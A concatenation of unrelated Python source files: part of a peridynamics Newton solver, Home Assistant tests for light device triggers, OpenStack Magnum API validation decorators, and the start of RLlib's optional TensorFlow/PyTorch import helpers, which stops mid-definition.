                        self.b[int(i), con.direction - 1, t_n] = self.shape_loading(deck, t_n, con, i)

    ## Provide the loading shape
    # @param deck The input deck
    # @param t_n Id of the time step
    # @param con Type of loading, "Force" or "Displacement"
    # @param i Id of Node "i"
    # @return Loading amplitude at time step t_n (None if the shape type is not "Ramp")
    def shape_loading(self, deck, t_n, con, i):
        time_t = deck.delta_t * t_n
        if deck.shape_type == "Ramp":
            if con.type == "Force":
                # Convert the applied force to a force density
                value = con.value / deck.geometry.volumes[int(i)]
            elif con.type == "Displacement":
                value = con.value
            else:
                # Previously this fell through and crashed with an
                # UnboundLocalError; fail with an explicit message instead.
                raise ValueError("Unsupported condition type: " + str(con.type))
            # Piecewise-linear ramp: rise until shape_values[0], hold until
            # shape_values[1], then decrease linearly to zero at shape_values[2]
            if time_t <= deck.shape_values[0]:
                return (value * time_t) / deck.shape_values[0]
            elif time_t <= deck.shape_values[1]:
                return value
            elif time_t <= deck.shape_values[2]:
                return value - value * (time_t - deck.shape_values[1]) / (deck.shape_values[2] - deck.shape_values[1])
            else:
                return 0

    ## Provide the internal force density for each node for a given time step t_n
    # @param deck The input deck
    # @param ysolver Initial guess for actual nodes' position
    # @param t_n Id of the time step
    # @return Internal force density for each node
    def internal_force(self, deck, ysolver, t_n):
        # Choice of the material class
        if deck.material_type == "Elastic":
            from ..materials.elastic import Elastic_material
            ## Data from the material class
            self.mat_class = Elastic_material(deck, self, ysolver)
            self.update_force_data(self.mat_class, t_n)
            self.update_ext_state_data(self.mat_class, t_n)
            self.update_strain_energy_data(self.mat_class, t_n)
        elif deck.material_type == "Viscoelastic":
            from ..materials.viscoelastic import Viscoelastic_material
            self.mat_class = Viscoelastic_material(deck, self, ysolver, t_n)
            self.update_force_data(self.mat_class, t_n)
            self.update_ext_state_data(self.mat_class, t_n)
            self.update_ext_state_visco_data(self.mat_class, t_n)
        return self.mat_class.f_int

    ## Provide the residual for each node after a solving step for a given time step t_n
    # @param deck The input deck
    # @param ysolver Initial guess for actual nodes' position
    # @param t_n Id of the time step
    # @return Residual for each node
    def residual_vector(self, deck, ysolver, t_n):
        residual = np.zeros((deck.num_nodes, deck.dim), dtype=np.float64)
        internal_force = self.internal_force(deck, ysolver, t_n)
        for con in deck.conditions:
            # Impose the displacement boundary conditions directly on ysolver.
            # con.direction is 1 (x), 2 (y) or 3 (z); assumes direction in {1, 2, 3}.
            if con.type == "Displacement" and con.shape == "Fixed":
                for id_node in con.id:
                    ysolver[int(id_node), con.direction - 1] = deck.geometry.nodes[int(id_node), con.direction - 1] + con.value
            if con.type == "Displacement" and con.shape == "Ramp":
                for id_node in con.id:
                    # BUG FIX: the original code indexed ysolver with the loop
                    # variable of the preceding "Fixed" branch instead of the
                    # node currently being iterated.
                    ysolver[int(id_node), con.direction - 1] = self.shape_loading(deck, t_n, con, id_node)
        # The residual is only evaluated on nodes without a displacement condition
        for i in range(0, deck.num_nodes):
            constrained = False
            for con in deck.conditions:
                if con.type == "Displacement" and i in con.id:
                    constrained = True
            if not constrained:
                residual[i, :] = internal_force[i, :] + self.b[i, :, t_n]
        return residual

    ## Provide the Jacobian (stiffness) matrix for a given time step t_n for the Newton's method
    # @param deck The input deck
    # @param ysolver Initial guess for actual nodes' position
    # @param t_n Id of the time step
    # @param perturbation_factor Magnitude of the perturbation factor
    # @return Jacobian matrix
    def jacobian_matrix(self, deck, ysolver, t_n, perturbation_factor):
        eps = perturbation_factor * deck.delta_X
        jacobian = np.zeros((deck.num_nodes * deck.dim, deck.num_nodes * deck.dim), dtype=np.float64)
        for i in range(0, deck.num_nodes):
            # Perturb node i itself and every node of its family
            traversal_list = np.append([i], self.neighbors.get_index_x_family(i))
            for j in traversal_list:
                for r in range(0, deck.dim):
                    # Central finite difference of the internal force density
                    # with respect to a perturbation of node j along axis r
                    eps_vector = np.zeros((deck.num_nodes, deck.dim), dtype=np.float64)
                    eps_vector[j, r] = eps
                    force_int_p = self.internal_force(deck, ysolver + eps_vector, t_n)[i, :]
                    force_int_m = self.internal_force(deck, ysolver - eps_vector, t_n)[i, :]
                    # Only the same-axis (r == s) entries are filled, matching
                    # the original implementation
                    jacobian[i * deck.dim + r, j * deck.dim + r] = (force_int_p[r] - force_int_m[r]) / (2. * eps)
        return jacobian

    ## Provide the displacement increment resulting from the Newton's method,
    ## for each node for a given time step t_n
    # @param deck The input deck
    # @param ysolver Initial guess for actual nodes' position
    # @param t_n Id of the time step
    # @param perturbation_factor Magnitude of the perturbation factor
    # @param residual Residual for each node resulting from a solving step
    # @return Displacement increment for each node
    def newton_step(self, deck, ysolver, t_n, perturbation_factor, residual):
        jacobian = self.jacobian_matrix(deck, ysolver, t_n, perturbation_factor)
        residual = np.reshape(residual, (deck.dim * deck.num_nodes, 1))
        # Degrees of freedom carrying an imposed displacement are removed
        # from the linear system before solving
        removeId = []
        for con in deck.conditions:
            if con.type == "Displacement":
                for i in con.id:
                    removeId.append(int((i * deck.dim) + con.direction - 1))
        removeId.sort()
        jacobian = np.delete(jacobian, removeId, 0)
        jacobian = np.delete(jacobian, removeId, 1)
        residual = np.delete(residual, removeId, 0)
        # Solve the linearized system J * delta_y = -residual (sparse solver)
        s = sparse.csr_matrix(jacobian)
        delta_y = linalg.spsolve(s, -residual)
        # Scatter the solution back onto the full DOF vector, leaving the
        # constrained DOFs at zero (vectorized mask assignment replaces the
        # original element-by-element copy loop)
        mask = np.ones((deck.num_nodes * deck.dim), dtype=bool)
        mask[removeId] = False
        result = np.zeros((deck.num_nodes * deck.dim), dtype=np.float64)
        result[mask] = delta_y
        return np.reshape(result, (deck.num_nodes, deck.dim))

    ## Solve the peridynamic problem at each time step using the Newton's method
    ## to obtain the actual nodes' position
    # @param deck The input deck
    # @param ysolver Initial guess for actual nodes' position
    def quasi_static_solver(self, deck, ysolver):
        for t_n in range(1, deck.time_steps):
            iteration = 1
            residual = self.residual_vector(deck, ysolver, t_n)
            res = linalgebra.norm(residual)
            while res >= deck.solver_tolerance and iteration <= deck.solver_max_it:
                print("iteration", iteration, res)
                if iteration == deck.solver_max_it:
                    print("Warning: Solver reached limit of " + str(deck.solver_max_it) + " iterations")
                delta_y = self.newton_step(deck, ysolver, t_n, deck.solver_perturbation, residual)
                ysolver += delta_y
                residual = self.residual_vector(deck, ysolver, t_n)
                res = linalgebra.norm(residual)
                iteration += 1
            self.y[:, :, t_n] = ysolver
            print("t_n:", t_n, "res:", res, "Iteration #", iteration - 1)

    ## Store the internal force density for each node at each time step
    # @param mat_class Data from the material class
    # @param t_n Id of the time step
    def update_force_data(self, mat_class, t_n):
        # Global internal force density array storing the force density attached to each node
        self.force_int[:, :, t_n] = mat_class.f_int

    ## Store the extension state for each node between itself and its family at each time step
    # @param mat_class Data from the material class
    # @param t_n Id of the time step
    def update_ext_state_data(self, mat_class, t_n):
        # Extension state at each node between the node and its family
        self.ext[:, :, t_n] = mat_class.e

    ## Store the viscoelastic part of the extension state for each node between itself and its family
    # @param mat_class Data from the material class
    # @param t_n Id of the time step
    def update_ext_state_visco_data(self, mat_class, t_n):
        # Viscoelastic part of the extension state at each node between the node and its family
        self.ext_visco[:, :, :, t_n] = mat_class.e_visco

    ## Store the strain energy for each node between itself and its family
    # @param mat_class Data from the material class
    # @param t_n Id of the time step
    def update_strain_energy_data(self, mat_class, t_n):
        # Strain energy at each node (original comment was a copy-paste of the
        # viscoelastic one)
        self.strain_energy[:, t_n] = mat_class.strain_energy

    ## Provide the strain between 2 nodes
    # @param deck The input deck
    # @param id_Node_1 Id of the 1st node
    # @param id_Node_2 Id of the 2nd node
    # @return Engineering strain of the bond at each time step
    def strain_calculation(self, deck, id_Node_1, id_Node_2):
        strain = np.zeros((deck.time_steps), dtype=np.float64)
        for t_n in range(1, deck.time_steps):
            actual = linalgebra.norm(self.y[id_Node_2, :, t_n] - self.y[id_Node_1, :, t_n])
            initial = linalgebra.norm(deck.geometry.nodes[id_Node_2, :] - deck.geometry.nodes[id_Node_1, :])
            strain[t_n] = (actual - initial) / initial
        return strain
| |
"""The test for light device automation."""
from datetime import timedelta
import pytest
import homeassistant.components.automation as automation
from homeassistant.components.light import DOMAIN
from homeassistant.const import CONF_PLATFORM, STATE_OFF, STATE_ON
from homeassistant.helpers import device_registry
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import (
MockConfigEntry,
async_fire_time_changed,
async_get_device_automation_capabilities,
async_get_device_automations,
async_mock_service,
mock_device_registry,
mock_registry,
)
@pytest.fixture
def device_reg(hass):
    """Provide a fresh mock device registry bound to hass."""
    registry = mock_device_registry(hass)
    return registry
@pytest.fixture
def entity_reg(hass):
    """Provide a fresh mock entity registry bound to hass."""
    registry = mock_registry(hass)
    return registry
@pytest.fixture
def calls(hass):
    """Record calls made to the mocked test.automation service."""
    recorded = async_mock_service(hass, "test", "automation")
    return recorded
async def test_get_triggers(hass, device_reg, entity_reg):
    """Test we get the expected triggers from a light."""
    config_entry = MockConfigEntry(domain="test", data={})
    config_entry.add_to_hass(hass)
    device_entry = device_reg.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
    )
    entity_reg.async_get_or_create(DOMAIN, "test", "5678", device_id=device_entry.id)

    # A light exposes exactly one turned_off and one turned_on device trigger.
    expected_triggers = [
        {
            "platform": "device",
            "domain": DOMAIN,
            "type": trigger_type,
            "device_id": device_entry.id,
            "entity_id": f"{DOMAIN}.test_5678",
        }
        for trigger_type in ("turned_off", "turned_on")
    ]
    triggers = await async_get_device_automations(hass, "trigger", device_entry.id)
    assert triggers == expected_triggers
async def test_get_trigger_capabilities(hass, device_reg, entity_reg):
    """Test we get the expected capabilities from a light trigger."""
    config_entry = MockConfigEntry(domain="test", data={})
    config_entry.add_to_hass(hass)
    device_entry = device_reg.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
    )
    entity_reg.async_get_or_create(DOMAIN, "test", "5678", device_id=device_entry.id)

    # Every light trigger advertises the same optional "for" duration field.
    expected_capabilities = {
        "extra_fields": [
            {"name": "for", "optional": True, "type": "positive_time_period_dict"}
        ]
    }
    triggers = await async_get_device_automations(hass, "trigger", device_entry.id)
    for trigger in triggers:
        capabilities = await async_get_device_automation_capabilities(
            hass, "trigger", trigger
        )
        assert capabilities == expected_capabilities
async def test_if_fires_on_state_change(hass, calls):
    """Test for turn_on and turn_off triggers firing."""
    platform = getattr(hass.components, f"test.{DOMAIN}")
    platform.init()
    assert await async_setup_component(hass, DOMAIN, {DOMAIN: {CONF_PLATFORM: "test"}})
    await hass.async_block_till_done()
    ent1, ent2, ent3 = platform.ENTITIES

    # Same template string the original assembled with a str.join over the
    # field names: "{{ trigger.platform }} - ... - {{ trigger.for }}".
    fields = ("platform", "entity_id", "from_state.state", "to_state.state", "for")
    trigger_vars = " - ".join("{{ trigger.%s }}" % field for field in fields)

    def automation_entry(trigger_type, prefix):
        """Build one automation: device trigger -> test.automation call."""
        return {
            "trigger": {
                "platform": "device",
                "domain": DOMAIN,
                "device_id": "",
                "entity_id": ent1.entity_id,
                "type": trigger_type,
            },
            "action": {
                "service": "test.automation",
                "data_template": {"some": f"{prefix} {trigger_vars}"},
            },
        }

    assert await async_setup_component(
        hass,
        automation.DOMAIN,
        {
            automation.DOMAIN: [
                automation_entry("turned_on", "turn_on"),
                automation_entry("turned_off", "turn_off"),
            ]
        },
    )
    await hass.async_block_till_done()
    assert hass.states.get(ent1.entity_id).state == STATE_ON
    assert len(calls) == 0

    hass.states.async_set(ent1.entity_id, STATE_OFF)
    await hass.async_block_till_done()
    assert len(calls) == 1
    assert calls[0].data["some"] == f"turn_off device - {ent1.entity_id} - on - off - None"

    hass.states.async_set(ent1.entity_id, STATE_ON)
    await hass.async_block_till_done()
    assert len(calls) == 2
    assert calls[1].data["some"] == f"turn_on device - {ent1.entity_id} - off - on - None"
async def test_if_fires_on_state_change_with_for(hass, calls):
    """Test for triggers firing with delay."""
    platform = getattr(hass.components, f"test.{DOMAIN}")
    platform.init()
    assert await async_setup_component(hass, DOMAIN, {DOMAIN: {CONF_PLATFORM: "test"}})
    await hass.async_block_till_done()
    ent1, ent2, ent3 = platform.ENTITIES

    # Same template string the original assembled with a str.join.
    fields = ("platform", "entity_id", "from_state.state", "to_state.state", "for")
    trigger_vars = " - ".join("{{ trigger.%s }}" % field for field in fields)

    assert await async_setup_component(
        hass,
        automation.DOMAIN,
        {
            automation.DOMAIN: [
                {
                    "trigger": {
                        "platform": "device",
                        "domain": DOMAIN,
                        "device_id": "",
                        "entity_id": ent1.entity_id,
                        "type": "turned_off",
                        "for": {"seconds": 5},
                    },
                    "action": {
                        "service": "test.automation",
                        "data_template": {"some": f"turn_off {trigger_vars}"},
                    },
                }
            ]
        },
    )
    await hass.async_block_till_done()
    assert hass.states.get(ent1.entity_id).state == STATE_ON
    assert len(calls) == 0

    # The trigger requires the off state to hold for 5 s, so nothing fires yet.
    hass.states.async_set(ent1.entity_id, STATE_OFF)
    await hass.async_block_till_done()
    assert len(calls) == 0

    async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
    await hass.async_block_till_done()
    assert len(calls) == 1
    await hass.async_block_till_done()
    assert calls[0].data["some"] == f"turn_off device - {ent1.entity_id} - on - off - 0:00:05"
| |
# Copyright 2015 Huawei Technologies Co.,LTD.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import decorator
import pecan
from keystoneauth1 import exceptions as ka_exception
from magnum.api import utils as api_utils
from magnum.common import clients
from magnum.common import exception
import magnum.conf
from magnum.drivers.common import driver
from magnum.i18n import _
from magnum import objects
CONF = magnum.conf.CONF
# Whitelists of fields that a PATCH/update request may modify; anything
# else is rejected by validate_cluster_properties / 
# validate_federation_properties below.
cluster_update_allowed_properties = set(['node_count', 'health_status',
                                         'health_status_reason'])
federation_update_allowed_properties = set(['member_ids', 'properties'])
def ct_not_found_to_bad_request():
    """Decorator factory: convert ClusterTemplateNotFound (404) into 400.

    Used on POST handlers that create a Cluster: a missing template there
    is a problem with the request body, not a missing URL resource.
    """
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        try:
            return func(*args, **kwargs)
        except exception.ClusterTemplateNotFound as e:
            # Change error code because 404 (NotFound) is inappropriate
            # response for a POST request to create a Cluster.  The
            # exception instance is mutated in place and re-raised so the
            # original message is preserved.
            e.code = 400  # BadRequest
            raise
    return wrapper
def enforce_cluster_type_supported():
    """Decorator factory: reject clusters whose COE type has no driver.

    Loads the cluster's template and asks the driver registry for a
    driver matching (server_type, cluster_distro, coe); get_driver is
    expected to raise if the combination is unsupported.
    """
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        # args[1] is the Cluster API object passed to the wrapped handler.
        cluster = args[1]
        cluster_template = objects.ClusterTemplate.get(
            pecan.request.context, cluster.cluster_template_id)
        cluster_type = (cluster_template.server_type,
                        cluster_template.cluster_distro,
                        cluster_template.coe)
        driver.Driver.get_driver(*cluster_type)
        return func(*args, **kwargs)
    return wrapper
def enforce_driver_supported():
    """Decorator factory: ensure a driver exists for the template's type.

    If the template does not carry a cluster_distro, a best-effort lookup
    of the glance image's ``os_distro`` property is attempted before
    consulting the driver registry.
    """
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        # args[1] is the ClusterTemplate API object.
        cluster_template = args[1]
        cluster_distro = cluster_template.cluster_distro
        if not cluster_distro:
            try:
                cli = clients.OpenStackClients(pecan.request.context)
                image_id = cluster_template.image_id
                image = api_utils.get_openstack_resource(cli.glance().images,
                                                         image_id,
                                                         'images')
                cluster_distro = image.get('os_distro')
            except Exception:
                # Deliberate best-effort: any failure talking to glance
                # simply leaves cluster_distro unset and lets get_driver()
                # decide whether the type is supported.
                pass
        cluster_type = (cluster_template.server_type,
                        cluster_distro,
                        cluster_template.coe)
        driver.Driver.get_driver(*cluster_type)
        return func(*args, **kwargs)
    return wrapper
def enforce_cluster_volume_storage_size():
    """Decorator factory: validate docker volume size for a new cluster.

    Merges the cluster's own docker_volume_size with its template's and
    delegates the actual check to _enforce_volume_storage_size.
    """
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        # args[1] is the Cluster API object being created.
        cluster = args[1]
        cluster_template = objects.ClusterTemplate.get(
            pecan.request.context, cluster.cluster_template_id)
        _enforce_volume_storage_size(
            cluster_template.as_dict(), cluster.as_dict())
        return func(*args, **kwargs)
    return wrapper
def enforce_valid_project_id_on_create():
    """Decorator factory: verify the quota's project exists in keystone."""
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        # args[1] is the Quota API object being created.
        quota = args[1]
        _validate_project_id(quota.project_id)
        return func(*args, **kwargs)
    return wrapper
def _validate_project_id(project_id):
    """Check that *project_id* exists in keystone.

    :param project_id: project id supplied by the API caller.
    :raises exception.ProjectNotFound: if keystone reports no such
        project.
    """
    try:
        context = pecan.request.context
        osc = clients.OpenStackClients(context)
        osc.keystone().domain_admin_client.projects.get(project_id)
    except ka_exception.http.NotFound as e:
        # Chain the keystone error so the original cause is preserved in
        # tracebacks/logs instead of being silently discarded.
        raise exception.ProjectNotFound(name='project_id',
                                        id=project_id) from e
def enforce_network_driver_types_create():
    """Decorator factory: validate network driver on template creation."""
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        # args[1] is the ClusterTemplate API object being created.
        cluster_template = args[1]
        _enforce_network_driver_types(cluster_template)
        return func(*args, **kwargs)
    return wrapper
def enforce_network_driver_types_update():
    """Decorator factory: validate network driver after applying a patch.

    Applies the JSON patch to a copy of the stored template and validates
    the resulting network driver, so invalid updates are rejected before
    anything is persisted.
    """
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        # args[1]: template identifier (uuid or name), args[2]: JSON patch.
        cluster_template_ident = args[1]
        patch = args[2]
        cluster_template = api_utils.get_resource('ClusterTemplate',
                                                  cluster_template_ident)
        try:
            cluster_template_dict = api_utils.apply_jsonpatch(
                cluster_template.as_dict(), patch)
        except api_utils.JSONPATCH_EXCEPTIONS as e:
            raise exception.PatchError(patch=patch, reason=e)
        # Build a transient object reflecting the patched state; it is
        # only used for validation and never saved.
        cluster_template = objects.ClusterTemplate(pecan.request.context,
                                                   **cluster_template_dict)
        _enforce_network_driver_types(cluster_template)
        return func(*args, **kwargs)
    return wrapper
def _enforce_network_driver_types(cluster_template):
    """Default (when unset) and validate the template's network driver."""
    coe_validator = Validator.get_coe_validator(cluster_template.coe)
    if not cluster_template.network_driver:
        # Fall back to the COE-specific default driver when none given.
        cluster_template.network_driver = coe_validator.default_network_driver
    coe_validator.validate_network_driver(cluster_template.network_driver)
def enforce_server_type():
    """Decorator factory: validate the template's server type for its COE."""
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        # args[1] is the ClusterTemplate API object.
        cluster_template = args[1]
        _enforce_server_type(cluster_template)
        return func(*args, **kwargs)
    return wrapper
def _enforce_server_type(cluster_template):
    """Check that the template's server_type is valid for its COE."""
    coe_validator = Validator.get_coe_validator(cluster_template.coe)
    coe_validator.validate_server_type(cluster_template.server_type)
def enforce_volume_driver_types_create():
    """Decorator factory: validate volume driver on template creation."""
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        # args[1] is the ClusterTemplate API object being created.
        cluster_template = args[1]
        _enforce_volume_driver_types(cluster_template.as_dict())
        return func(*args, **kwargs)
    return wrapper
def enforce_volume_storage_size_create():
    """Decorator factory: validate docker volume size on template creation.

    Passes an empty cluster dict, so only the template's own
    docker_volume_size is checked here.
    """
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        # args[1] is the ClusterTemplate API object being created.
        cluster_template = args[1]
        _enforce_volume_storage_size(cluster_template.as_dict(), {})
        return func(*args, **kwargs)
    return wrapper
def enforce_volume_driver_types_update():
    """Decorator factory: validate volume driver after applying a patch.

    Applies the JSON patch to a copy of the stored template's dict and
    validates the resulting volume driver before the update proceeds.
    """
    @decorator.decorator
    def wrapper(func, *args, **kwargs):
        # args[1]: template identifier (uuid or name), args[2]: JSON patch.
        cluster_template_ident = args[1]
        patch = args[2]
        cluster_template = api_utils.get_resource('ClusterTemplate',
                                                  cluster_template_ident)
        try:
            cluster_template_dict = api_utils.apply_jsonpatch(
                cluster_template.as_dict(), patch)
        except api_utils.JSONPATCH_EXCEPTIONS as e:
            raise exception.PatchError(patch=patch, reason=e)
        _enforce_volume_driver_types(cluster_template_dict)
        return func(*args, **kwargs)
    return wrapper
def _enforce_volume_driver_types(cluster_template):
    """Validate the (optional) volume driver of a template dict.

    The COE validator is resolved first so an unsupported COE is still
    rejected even when no volume driver is set.
    """
    coe_validator = Validator.get_coe_validator(cluster_template['coe'])
    driver_name = cluster_template.get('volume_driver')
    if driver_name:
        coe_validator.validate_volume_driver(driver_name)
def _enforce_volume_storage_size(cluster_template, cluster):
    """Check docker_volume_size is large enough for the storage driver.

    The cluster's own value overrides the template's.  The devicemapper
    storage driver requires a docker volume of at least 3GB.

    :param cluster_template: template as a dict.
    :param cluster: cluster as a dict (may be empty on template-only
        validation).
    :raises exception.InvalidParameterValue: if the size is unset or < 3GB
        while the devicemapper storage driver is selected.
    """
    volume_size = cluster.get('docker_volume_size') \
        or cluster_template.get('docker_volume_size')
    storage_driver = cluster_template.get('docker_storage_driver')
    if storage_driver == 'devicemapper':
        if not volume_size or volume_size < 3:
            # Wrap in _() for translation, consistent with every other
            # error message in this module.
            raise exception.InvalidParameterValue(
                _('docker volume size %(size)s GB is not valid, '
                  'expecting minimum value 3GB for %(driver)s storage '
                  'driver.') % {'size': volume_size,
                                'driver': storage_driver})
def validate_cluster_properties(delta):
    """Raise if *delta* touches cluster fields outside the allowed set."""
    disallowed = delta - cluster_update_allowed_properties
    if not disallowed:
        return
    raise exception.InvalidParameterValue(
        err=_("cannot change cluster property(ies) %s.") %
        ", ".join(disallowed))
def validate_federation_properties(delta):
    """Raise if *delta* touches federation fields outside the allowed set."""
    disallowed = delta - federation_update_allowed_properties
    if not disallowed:
        return
    raise exception.InvalidParameterValue(
        err=_("cannot change federation property(ies) %s.") %
        ", ".join(disallowed))
class Validator(object):
    """Base class for COE-specific validation of cluster template fields.

    Concrete subclasses provide the class attributes consulted here:
    ``supported_network_drivers``, ``allowed_network_drivers``,
    ``default_network_driver``, ``supported_volume_driver`` and
    ``supported_server_types``.
    """
    @classmethod
    def get_coe_validator(cls, coe):
        """Return a validator instance for the given COE name.

        :raises exception.InvalidParameterValue: for unknown COE types.
        """
        validator_map = {
            'kubernetes': K8sValidator,
            'swarm': SwarmValidator,
            'swarm-mode': SwarmValidator,
            'mesos': MesosValidator,
        }
        validator_cls = validator_map.get(coe)
        if validator_cls is None:
            raise exception.InvalidParameterValue(
                _('Requested COE type %s is not supported.') % coe)
        return validator_cls()
    @classmethod
    def validate_network_driver(cls, driver):
        """Check the network driver is both supported and allowed."""
        cls._validate_network_driver_supported(driver)
        cls._validate_network_driver_allowed(driver)
    @classmethod
    def _validate_network_driver_supported(cls, driver):
        """Confirm that driver is supported by Magnum for this COE."""
        supported = cls.supported_network_drivers
        if driver not in supported:
            msg = _('Network driver type %(driver)s is not supported, '
                    'expecting a %(supported_drivers)s network driver.')
            raise exception.InvalidParameterValue(msg % {
                'driver': driver,
                'supported_drivers': '/'.join(supported + ['unspecified'])})
    @classmethod
    def _validate_network_driver_allowed(cls, driver):
        """Confirm that driver is allowed via configuration for this COE."""
        allowed = cls.allowed_network_drivers
        if 'all' in allowed or driver in allowed:
            return
        msg = _('Network driver type %(driver)s is not allowed, '
                'expecting a %(allowed_drivers)s network driver. ')
        raise exception.InvalidParameterValue(msg % {
            'driver': driver,
            'allowed_drivers': '/'.join(allowed + ['unspecified'])})
    @classmethod
    def validate_volume_driver(cls, driver):
        """Check the volume driver is supported for this COE."""
        cls._validate_volume_driver_supported(driver)
    @classmethod
    def _validate_volume_driver_supported(cls, driver):
        """Confirm that volume driver is supported by Magnum for this COE."""
        supported = cls.supported_volume_driver
        if driver not in supported:
            msg = _('Volume driver type %(driver)s is not supported, '
                    'expecting a %(supported_volume_driver)s volume driver.')
            raise exception.InvalidParameterValue(msg % {
                'driver': driver,
                'supported_volume_driver': '/'.join(
                    supported + ['unspecified'])})
    @classmethod
    def validate_server_type(cls, server_type):
        """Check the server type is supported for this COE."""
        cls._validate_server_type(server_type)
    @classmethod
    def _validate_server_type(cls, server_type):
        """Confirm that server type is supported by Magnum for this COE."""
        supported = cls.supported_server_types
        if server_type not in supported:
            msg = _('Server type %(server_type)s is not supported, '
                    'expecting a %(supported_server_types)s server type.')
            raise exception.InvalidParameterValue(msg % {
                'server_type': server_type,
                'supported_server_types': '/'.join(
                    supported + ['unspecified'])})
class K8sValidator(Validator):
    """Validation whitelists and defaults for the Kubernetes COE."""
    supported_network_drivers = ['flannel', 'calico']
    supported_server_types = ['vm', 'bm']
    # Operator-configurable whitelist/default, read from magnum.conf.
    allowed_network_drivers = (
        CONF.cluster_template.kubernetes_allowed_network_drivers)
    default_network_driver = (
        CONF.cluster_template.kubernetes_default_network_driver)
    supported_volume_driver = ['cinder']
class SwarmValidator(Validator):
    """Validation whitelists and defaults for swarm and swarm-mode COEs."""
    supported_network_drivers = ['docker', 'flannel']
    supported_server_types = ['vm', 'bm']
    # Operator-configurable whitelist/default, read from magnum.conf.
    allowed_network_drivers = (CONF.cluster_template.
                               swarm_allowed_network_drivers)
    default_network_driver = (CONF.cluster_template.
                              swarm_default_network_driver)
    supported_volume_driver = ['rexray']
class MesosValidator(Validator):
    """Validation whitelists and defaults for the Mesos COE."""
    supported_network_drivers = ['docker']
    supported_server_types = ['vm', 'bm']
    # Operator-configurable whitelist/default, read from magnum.conf.
    allowed_network_drivers = (CONF.cluster_template.
                               mesos_allowed_network_drivers)
    default_network_driver = (CONF.cluster_template.
                              mesos_default_network_driver)
    supported_volume_driver = ['rexray']
| |
import logging
import os
import sys
from typing import Any, Optional
from ray.rllib.utils.typing import TensorStructType, TensorShape, TensorType
logger = logging.getLogger(__name__)
# Represents a generic tensor type.
# (Re-bound here so users can import this alias from this module.)
TensorType = TensorType
# Either a plain tensor, or a dict or tuple of tensors (or StructTensors).
TensorStructType = TensorStructType
def try_import_tf(error=False):
"""Tries importing tf and returns the module (or None).
Args:
error (bool): Whether to raise an error if tf cannot be imported.
Returns:
Tuple:
- tf1.x module (either from tf2.x.compat.v1 OR as tf1.x).
- tf module (resulting from `import tensorflow`).
Either tf1.x or 2.x.
- The actually installed tf version as int: 1 or 2.
Raises:
ImportError: If error=True and tf is not installed.
"""
# Make sure, these are reset after each test case
# that uses them: del os.environ["RLLIB_TEST_NO_TF_IMPORT"]
if "RLLIB_TEST_NO_TF_IMPORT" in os.environ:
logger.warning("Not importing TensorFlow for test purposes")
return None, None, None
if "TF_CPP_MIN_LOG_LEVEL" not in os.environ:
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
# Try to reuse already imported tf module. This will avoid going through
# the initial import steps below and thereby switching off v2_behavior
# (switching off v2 behavior twice breaks all-framework tests for eager).
was_imported = False
if "tensorflow" in sys.modules:
tf_module = sys.modules["tensorflow"]
was_imported = True
else:
try:
import tensorflow as tf_module
except ImportError as e:
if error:
raise e
return None, None, None
# Try "reducing" tf to tf.compat.v1.
try:
tf1_module = tf_module.compat.v1
if not was_imported:
tf1_module.disable_v2_behavior()
# No compat.v1 -> return tf as is.
except AttributeError:
tf1_module = tf_module
if not hasattr(tf_module, "__version__"):
version = 1 # sphinx doc gen
else:
version = 2 if "2." in tf_module.__version__[:2] else 1
return tf1_module, tf_module, version
def tf_function(tf_module):
    """Conditional decorator for @tf.function.
    Use @tf_function(tf) instead to avoid errors if tf is not installed."""
    def _maybe_compile(func):
        # No tf available, or running eagerly: leave the function untouched
        # (it either won't be used or must not be graph-compiled).
        if tf_module is None or tf_module.executing_eagerly():
            return func
        # Otherwise wrap it into a tf graph function.
        return tf_module.function(func)
    return _maybe_compile
def try_import_tfp(error=False):
    """Tries importing tfp and returns the module (or None).

    Args:
        error (bool): Whether to raise an error if tfp cannot be imported.

    Returns:
        The tfp module.

    Raises:
        ImportError: If error=True and tfp is not installed.
    """
    if "RLLIB_TEST_NO_TF_IMPORT" in os.environ:
        logger.warning("Not importing TensorFlow Probability for test "
                       "purposes.")
        return None
    try:
        import tensorflow_probability as tfp
    except ImportError as e:
        if error:
            raise e
        return None
    return tfp
# Fake module for torch.nn.
class NNStub:
    """Stand-in for the `torch.nn` module when torch is not installed."""
    def __init__(self, *a, **kw):
        # Mirror the two attributes rllib code touches on torch.nn:
        # `nn.functional` (stubbed as None) and `nn.Module` (raises on use).
        self.functional = None
        self.Module = ModuleStub
# Fake class for torch.nn.Module to allow it to be inherited from.
class ModuleStub:
def __init__(self, *a, **kw):
raise ImportError("Could not import `torch`.")
def try_import_torch(error=False):
    """Tries importing torch and returns the module (or None).

    Args:
        error (bool): Whether to raise an error if torch cannot be imported.

    Returns:
        tuple: torch AND torch.nn modules.

    Raises:
        ImportError: If error=True and PyTorch is not installed.
    """
    if "RLLIB_TEST_NO_TORCH_IMPORT" in os.environ:
        logger.warning("Not importing PyTorch for test purposes.")
        return _torch_stubs()
    try:
        import torch
        import torch.nn as nn
    except ImportError:
        if error:
            raise
        return _torch_stubs()
    return torch, nn
def _torch_stubs():
    """Return the (torch, nn) pair used when torch is unavailable."""
    return None, NNStub()
def get_variable(value,
